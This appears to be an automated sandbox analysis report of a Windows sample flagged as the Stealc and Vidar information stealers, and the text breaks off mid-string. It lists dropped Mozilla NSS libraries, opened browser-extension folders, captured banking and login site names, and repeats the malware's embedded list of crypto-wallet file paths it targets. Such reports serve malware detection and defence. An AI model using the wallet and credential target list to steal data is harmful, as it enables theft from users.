Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: 9JtNIXVedn.exe, 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 9JtNIXVedn.exe, 00000000.00000003.1566125167.0000000021CD9000.00000004.00000020.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000003.1575489765.0000000021CCD000.00000004.00000020.00020000.00000000.sdmp, CGCAKKKEGCAKJKFIIEGI.0.dr, EGDBFIIECBGDGDGDHCAK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: 9JtNIXVedn.exe, 00000000.00000002.1689241861.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 9JtNIXVedn.exe, 00000000.00000002.1670753498.000000001BC20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 9JtNIXVedn.exe	String found in binary or memory: ;application/vnd.adobe.air-application-installer-package+zip
Source: 9JtNIXVedn.exe	String found in binary or memory: application/vnd.groove-help
Source: 9JtNIXVedn.exe	String found in binary or memory: "application/x-install-instructions
Source: 9JtNIXVedn.exe	String found in binary or memory: NATS-SEFI-ADD
Source: 9JtNIXVedn.exe	String found in binary or memory: NATS-DANO-ADD
Source: 9JtNIXVedn.exe	String found in binary or memory: JIS_C6229-1984-b-add
Source: 9JtNIXVedn.exe	String found in binary or memory: jp-ocr-b-add
Source: 9JtNIXVedn.exe	String found in binary or memory: JIS_C6229-1984-hand-add
Source: 9JtNIXVedn.exe	String found in binary or memory: jp-ocr-hand-add
Source: 9JtNIXVedn.exe	String found in binary or memory: ISO_6937-2-add

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: 9JtNIXVedn.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 9JtNIXVedn.exe

Static file information: File size 10183264 > 1048576

Source: 9JtNIXVedn.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x577800
Source: 9JtNIXVedn.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x38a000

Source: 9JtNIXVedn.exe

Static PE information: More than 200 imports for user32.dll

Source: 9JtNIXVedn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: mozglue.pdbP source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

PE file contains sections with non-standard names

Source: 9JtNIXVedn.exe	Static PE information: section name: .didata
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg

Drops PE files

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CDCEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CDCEBF0

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Source: CBFBGCGI.0.dr	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: CBFBGCGI.0.dr	Binary or memory string: global block list test formVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: CBFBGCGI.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: CBFBGCGI.0.dr	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: CBFBGCGI.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: CBFBGCGI.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: CBFBGCGI.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: CBFBGCGI.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: CBFBGCGI.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: AMC password management pageVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: CBFBGCGI.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: CBFBGCGI.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CBFBGCGI.0.dr	Binary or memory string: discord.comVMware20,11696497155f
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWI
Source: CBFBGCGI.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: CBFBGCGI.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: CBFBGCGI.0.dr	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: CBFBGCGI.0.dr	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: CBFBGCGI.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: CBFBGCGI.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: CBFBGCGI.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CE9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CE9AC62

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CE9AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CE9AC62

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

0_2_6CEE4760

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

0_2_6CDC1C30

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CE9AE71 cpuid

0_2_6CE9AE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CE9A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CE9A8DC

Source: C:\Users\user\Desktop\9JtNIXVedn.exe

Code function: 0_2_6CDE8390 NSS_GetVersion,

0_2_6CDE8390

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: en\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 